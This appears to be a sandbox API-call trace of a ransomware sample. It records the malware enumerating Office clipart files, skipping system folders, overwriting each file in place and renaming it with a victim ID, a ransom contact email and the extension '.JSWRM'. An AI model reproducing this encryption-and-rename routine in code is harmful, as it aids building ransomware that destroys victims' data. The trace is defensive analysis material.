1 [0088.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0088.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0088.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0088.465] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239191.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239191.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.465] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5220) returned 1 [0088.465] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1460) returned 0x205850 [0088.466] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1460, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1460, lpOverlapped=0x0) returned 1 [0088.468] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.468] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1460, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1460, lpOverlapped=0x0) returned 1 [0088.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.468] CloseHandle (hObject=0x314) returned 1 [0088.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0088.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0088.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0088.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0088.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0088.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0088.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.468] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239191.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239191.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239191.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239191.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0088.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0088.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0088.469] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecdfcbb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecdfcbb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecdfcbb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8424, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0239611.WMF", cAlternateFileName="")) returned 1 [0088.469] lstrcmpiW (lpString1="J0239611.WMF", lpString2=".") returned 1 [0088.469] lstrcmpiW (lpString1="J0239611.WMF", lpString2="..") returned 1 [0088.469] lstrcmpiW (lpString1="J0239611.WMF", lpString2="...") returned 1 [0088.469] lstrcmpiW (lpString1="J0239611.WMF", lpString2="windows") returned -1 [0088.469] lstrcmpiW (lpString1="J0239611.WMF", lpString2="recovery") returned -1 [0088.469] lstrcmpiW (lpString1="J0239611.WMF", lpString2="perflogs") returned -1 [0088.469] lstrcmpiW (lpString1="J0239611.WMF", lpString2="documents and settings") returned 1 [0088.469] lstrcmpiW (lpString1="J0239611.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.469] lstrcmpiW (lpString1="J0239611.WMF", lpString2="system volume information") returned -1 [0088.469] lstrcmpiW (lpString1="J0239611.WMF", lpString2="msocache") returned -1 [0088.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0088.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239611.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239611.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239611.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0088.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0088.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239611.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239611.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239611.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0088.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0088.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0088.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0088.470] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239611.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239611.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.470] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=33828) returned 1 [0088.470] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8420) returned 0x24d210 [0088.470] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8420, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8420, lpOverlapped=0x0) returned 1 [0088.474] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.474] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8420, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8420, lpOverlapped=0x0) returned 1 [0088.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.476] CloseHandle (hObject=0x314) returned 1 [0088.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0088.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0088.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0088.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0088.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0088.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0088.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0088.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0088.476] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239611.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239611.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239611.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239611.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0088.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0088.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0088.477] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecdfcbb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecdfcbb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecdfcbb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1314, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0239935.WMF", cAlternateFileName="")) returned 1 [0088.477] lstrcmpiW (lpString1="J0239935.WMF", lpString2=".") returned 1 [0088.477] lstrcmpiW (lpString1="J0239935.WMF", lpString2="..") returned 1 [0088.477] lstrcmpiW (lpString1="J0239935.WMF", lpString2="...") returned 1 [0088.477] lstrcmpiW (lpString1="J0239935.WMF", lpString2="windows") returned -1 [0088.477] lstrcmpiW (lpString1="J0239935.WMF", lpString2="recovery") returned -1 [0088.477] lstrcmpiW (lpString1="J0239935.WMF", lpString2="perflogs") returned -1 [0088.477] lstrcmpiW (lpString1="J0239935.WMF", lpString2="documents and settings") returned 1 [0088.477] lstrcmpiW (lpString1="J0239935.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.477] lstrcmpiW (lpString1="J0239935.WMF", lpString2="system volume information") returned -1 [0088.477] lstrcmpiW (lpString1="J0239935.WMF", lpString2="msocache") returned -1 [0088.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0088.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239935.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239935.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239935.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0088.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0088.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239935.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239935.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239935.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0088.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0088.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0088.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0088.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239935.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239935.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.478] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4884) returned 1 [0088.478] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1310) returned 0x205850 [0088.478] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1310, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1310, lpOverlapped=0x0) returned 1 [0088.480] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.480] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1310, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1310, lpOverlapped=0x0) returned 1 [0088.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.481] CloseHandle (hObject=0x314) returned 1 [0088.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0088.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0088.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0088.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0088.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0088.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0088.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.481] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239935.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239935.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239935.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239935.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0088.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0088.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0088.482] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecdfcbb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecdfcbb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecdfcbb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1418, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0239941.WMF", cAlternateFileName="")) returned 1 [0088.482] lstrcmpiW (lpString1="J0239941.WMF", lpString2=".") returned 1 [0088.482] lstrcmpiW (lpString1="J0239941.WMF", lpString2="..") returned 1 [0088.482] lstrcmpiW (lpString1="J0239941.WMF", lpString2="...") returned 1 [0088.482] lstrcmpiW (lpString1="J0239941.WMF", lpString2="windows") returned -1 [0088.482] lstrcmpiW (lpString1="J0239941.WMF", lpString2="recovery") returned -1 [0088.482] lstrcmpiW (lpString1="J0239941.WMF", lpString2="perflogs") returned -1 [0088.482] lstrcmpiW (lpString1="J0239941.WMF", lpString2="documents and settings") returned 1 [0088.482] lstrcmpiW (lpString1="J0239941.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.482] lstrcmpiW (lpString1="J0239941.WMF", lpString2="system volume information") returned -1 [0088.482] lstrcmpiW (lpString1="J0239941.WMF", lpString2="msocache") returned -1 [0088.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0088.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239941.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239941.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239941.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0088.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0088.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239941.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239941.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239941.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0088.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0088.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0088.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0088.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239941.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239941.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.483] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5144) returned 1 [0088.483] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1410) returned 0x205850 [0088.483] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1410, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1410, lpOverlapped=0x0) returned 1 [0088.485] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.485] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1410, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1410, lpOverlapped=0x0) returned 1 [0088.485] 